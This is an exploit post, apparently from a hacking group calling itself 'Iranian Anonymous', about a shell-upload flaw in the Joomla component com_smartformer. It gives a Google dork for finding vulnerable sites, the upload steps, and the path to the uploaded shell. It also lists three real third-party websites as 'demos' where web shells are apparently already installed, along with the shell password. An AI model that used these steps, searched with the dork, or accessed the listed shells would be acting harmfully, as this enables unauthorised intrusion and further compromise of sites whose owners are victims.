########################## # Exploit Title: Joomla Component com_smartformer shell upload Vulnerability # Dork Google : inurl:"index.php?option=com_smartformer" # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # Tested on : win ########################### Exploit : Go To # http://localhost/index.php?option=com_smartformer&Itemid=34 # upload shell.php # Your shell : http://localhost/components/com_smartformer/files/x.php ############################ # Demo : # 1) http://www.bmjournal.in/components/com_smartformer/files/x.php # 2) http://www.advancelitho.co.ke/components/com_smartformer/files/x.php # 3) http://www.securesystems.com.au/components/com_smartformer/files/x.php # Shell password => dz0 ############################# #Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd [email protected] || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || And All Of Iranian Anonymous . # Discovered By: Hacker Khan